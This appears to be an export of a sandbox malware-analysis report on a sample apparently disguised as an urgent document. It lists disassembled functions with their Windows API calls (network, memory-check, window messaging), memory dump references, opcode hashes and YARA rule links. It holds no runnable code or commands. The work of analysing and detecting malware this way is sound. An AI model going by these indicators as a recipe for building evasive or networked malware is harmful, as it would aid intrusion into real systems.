                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: 2fad9f8248d96d883e87a625a7967d2388416e0194ab04b9425aff81e98ec75e
                                                        • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                        • Opcode Fuzzy Hash: 2fad9f8248d96d883e87a625a7967d2388416e0194ab04b9425aff81e98ec75e
                                                        • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                        Function 00412957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00412968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                        • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                        • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                        • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                        Function 00440574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID: DdL$DdL
                                                        • API String ID: 1473721057-91670653
                                                        • Opcode ID: 5e91e0f9761e9d7bc780f905406615417003885d8eec73c8253ff09b9dbf17c9
                                                        • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                        • Opcode Fuzzy Hash: 5e91e0f9761e9d7bc780f905406615417003885d8eec73c8253ff09b9dbf17c9
                                                        • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                        Function 0047258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0047259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                        • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                        • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                        • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                        Function 00486A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                        • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                        • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                                                        • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                        Function 004628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: bf030040d580581949e15b20af0d453f6f6e00ffbb8a4a7429e9bb56af3c6344
                                                        • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                        • Opcode Fuzzy Hash: bf030040d580581949e15b20af0d453f6f6e00ffbb8a4a7429e9bb56af3c6344
                                                        • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                        Function 004866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                        • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                        • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                        • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                        Function 00486C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                        • GetSysColor.USER32(00000012), ref: 00486C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                        • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                        • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                        • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                        Function 00486920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                        • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                        • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                        • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                        Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                        • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                        • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                        • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                        Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                        • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                        • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                        • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                        Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • _wcscat.LIBCMT ref: 00444CB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FullNamePath_memmove_wcscat
                                                        • String ID: SL
                                                        • API String ID: 257928180-181245872
                                                        • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                        • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                        • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                        • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                        Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                        • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                        • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                        • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                        Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                        • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                        • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                        • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                        Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                        • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                        • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                        • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                        Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0045C534
                                                          • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                          • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                          • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                        • VariantClear.OLEAUT32(?), ref: 0045C556
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
